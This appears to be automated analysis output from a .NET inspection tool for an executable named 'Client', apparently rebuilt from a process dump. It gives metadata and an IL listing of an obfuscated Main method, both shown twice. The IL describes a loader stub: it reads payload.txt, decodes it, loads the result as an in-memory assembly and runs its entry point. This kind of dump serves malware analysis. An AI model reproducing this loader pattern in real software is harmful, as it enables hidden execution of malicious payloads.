008faa9f108e02c3303b7c6c5e2304c9

PE Detect: PeReader FAIL, AsmResolver Mapped OK

Remap: Mapped -> FileLayout (RAM only) as [Rebuild from dump]_6145e715.exe

Client

Client

System.Void ᐬ鯉≪묑鸩쬇ぇꪭ擄쥿ᣍက暶�袆몶藜⽚鍋쨿::Main(System.String[])

Client

ModuleDef

Windows

v4.0.30319

512

<null>

Client

1.4.1.0

<null>

False

<null>

.NETFramework,Version=v4.5.2

11130

System.Void ᐬ鯉≪묑鸩쬇ぇꪭ擄쥿ᣍက暶�袆몶藜⽚鍋쨿::Main(System.String[])

55

ldstr payload.txt call System.Boolean System.IO.File::Exists(System.String) brtrue.s IL_0025: ldstr "payload.txt" ldstr Configuração não encontrada. ldstr Erro ldc.i4.0 <null> ldc.i4.s 16 call System.Windows.Forms.DialogResult System.Windows.Forms.MessageBox::Show(System.String,System.String,System.Windows.Forms.MessageBoxButtons,System.Windows.Forms.MessageBoxIcon) pop <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) ldstr payload.txt call System.String System.IO.File::ReadAllText(System.String) callvirt System.String System.String::Trim() call System.String ᐬ鯉≪묑鸩쬇ぇꪭ擄쥿ᣍက暶�袆몶藜⽚鍋쨿::䀚螄婏窘솘⁽䶳䂫ዢ匠樊졚镝䪽ᑀ퐧䃵헿饹師(System.String) call System.Byte[] System.Convert::FromBase64String(System.String) call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) callvirt System.Reflection.MethodInfo System.Reflection.Assembly::get_EntryPoint() stloc.0 <null> ldloc.0 <null> ldnull <null> call System.Boolean System.Reflection.MethodInfo::op_Inequality(System.Reflection.MethodInfo,System.Reflection.MethodInfo) brfalse.s IL_0064: leave.s IL_00A2 ldloc.0 <null> ldnull <null> ldc.i4.1 <null> newarr System.Object dup <null> ldc.i4.0 <null> ldarg.0 <null> stelem.ref <null> callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave.s IL_00A2: ret stloc.1 <null> ldstr error.log call System.DateTime System.DateTime::get_Now() stloc.2 <null> ldloca.s V_2 call System.String System.DateTime::ToString() ldstr : ldloc.1 <null> dup <null> brtrue.s IL_0086: callvirt System.String System.Object::ToString() pop <null> ldnull <null> br.s IL_008B: ldstr "\r\n" callvirt System.String System.Object::ToString() ldstr call System.String System.String::Concat(System.String,System.String,System.String,System.String) call System.Void System.IO.File::AppendAllText(System.String,System.String) ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) leave.s IL_00A2: ret ret <null>

Client

Client

System.Void ᐬ鯉≪묑鸩쬇ぇꪭ擄쥿ᣍက暶�袆몶藜⽚鍋쨿::Main(System.String[])

Client

ModuleDef

Windows

v4.0.30319

512

<null>

Client

1.4.1.0

<null>

False

<null>

.NETFramework,Version=v4.5.2

11130

System.Void ᐬ鯉≪묑鸩쬇ぇꪭ擄쥿ᣍက暶�袆몶藜⽚鍋쨿::Main(System.String[])

55

ldstr payload.txt call System.Boolean System.IO.File::Exists(System.String) brtrue.s IL_0025: ldstr "payload.txt" ldstr Configuração não encontrada. ldstr Erro ldc.i4.0 <null> ldc.i4.s 16 call System.Windows.Forms.DialogResult System.Windows.Forms.MessageBox::Show(System.String,System.String,System.Windows.Forms.MessageBoxButtons,System.Windows.Forms.MessageBoxIcon) pop <null> ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) ldstr payload.txt call System.String System.IO.File::ReadAllText(System.String) callvirt System.String System.String::Trim() call System.String ᐬ鯉≪묑鸩쬇ぇꪭ擄쥿ᣍက暶�袆몶藜⽚鍋쨿::䀚螄婏窘솘⁽䶳䂫ዢ匠樊졚镝䪽ᑀ퐧䃵헿饹師(System.String) call System.Byte[] System.Convert::FromBase64String(System.String) call System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[]) callvirt System.Reflection.MethodInfo System.Reflection.Assembly::get_EntryPoint() stloc.0 <null> ldloc.0 <null> ldnull <null> call System.Boolean System.Reflection.MethodInfo::op_Inequality(System.Reflection.MethodInfo,System.Reflection.MethodInfo) brfalse.s IL_0064: leave.s IL_00A2 ldloc.0 <null> ldnull <null> ldc.i4.1 <null> newarr System.Object dup <null> ldc.i4.0 <null> ldarg.0 <null> stelem.ref <null> callvirt System.Object System.Reflection.MethodBase::Invoke(System.Object,System.Object[]) pop <null> leave.s IL_00A2: ret stloc.1 <null> ldstr error.log call System.DateTime System.DateTime::get_Now() stloc.2 <null> ldloca.s V_2 call System.String System.DateTime::ToString() ldstr : ldloc.1 <null> dup <null> brtrue.s IL_0086: callvirt System.String System.Object::ToString() pop <null> ldnull <null> br.s IL_008B: ldstr "\r\n" callvirt System.String System.Object::ToString() ldstr call System.String System.String::Concat(System.String,System.String,System.String,System.String) call System.Void System.IO.File::AppendAllText(System.String,System.String) ldc.i4.0 <null> call System.Void System.Environment::Exit(System.Int32) leave.s IL_00A2: ret ret <null>

MemoryMapped (process dump suspected)

MemoryMapped (process dump suspected)